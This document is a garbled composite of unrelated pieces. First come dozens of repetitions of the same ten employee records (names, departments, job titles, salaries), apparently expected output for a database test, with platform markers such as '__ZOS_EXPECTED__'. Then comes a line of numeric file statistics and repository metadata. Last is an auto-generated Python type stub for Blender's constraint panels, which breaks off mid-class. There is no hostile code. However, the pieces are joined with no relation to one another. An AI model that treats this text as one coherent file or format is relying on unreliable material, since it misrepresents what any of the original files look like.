#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#__ZOS_EXPECTED__
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#__SYSTEMI_EXPECTED__
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#__IDS_EXPECTED__
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
| 37.140312 | 144 | 0.582394 | 2,622 | 16,676 | 3.67582 | 0.045767 | 0.058103 | 0.045653 | 0.058103 | 0.946773 | 0.946773 | 0.937228 | 0.93204 | 0.93204 | 0.93204 | 0 | 0.365344 | 0.262533 | 16,676 | 448 | 145 | 37.223214 | 0.418361 | 0.85788 | 0 | 0.258065 | 0 | 0 | 0.084824 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0 | null | null | 0.032258 | 0.129032 | null | null | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
9a90a99d534599c47ded5d5f61e7ea35e8f5aa9b | 334,244 | py | Python | typings/bl_ui/properties_constraint.py | Argmaster/PyR3 | 6786bcb6a101fe4bd4cc50fe43767b8178504b15 | [
"MIT"
] | 2 | 2021-12-12T18:51:52.000Z | 2022-02-23T09:49:16.000Z | typings/bl_ui/properties_constraint.py | Argmaster/PyR3 | 6786bcb6a101fe4bd4cc50fe43767b8178504b15 | [
"MIT"
] | 2 | 2021-11-08T12:09:02.000Z | 2021-12-12T23:01:12.000Z | typings/bl_ui/properties_constraint.py | Argmaster/PyR3 | 6786bcb6a101fe4bd4cc50fe43767b8178504b15 | [
"MIT"
] | null | null | null | import sys
import typing
import bpy_types
class BoneConstraintPanel:
bl_context = None
''' '''
def poll(self, context):
'''
'''
pass
class ConstraintButtonsPanel:
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_space_type = None
''' '''
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
class ConstraintButtonsSubPanel:
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_space_type = None
''' '''
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
class ObjectConstraintPanel:
bl_context = None
''' '''
def poll(self, context):
'''
'''
pass
class BONE_PT_constraints(BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bActionConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bArmatureConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bCameraSolverConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
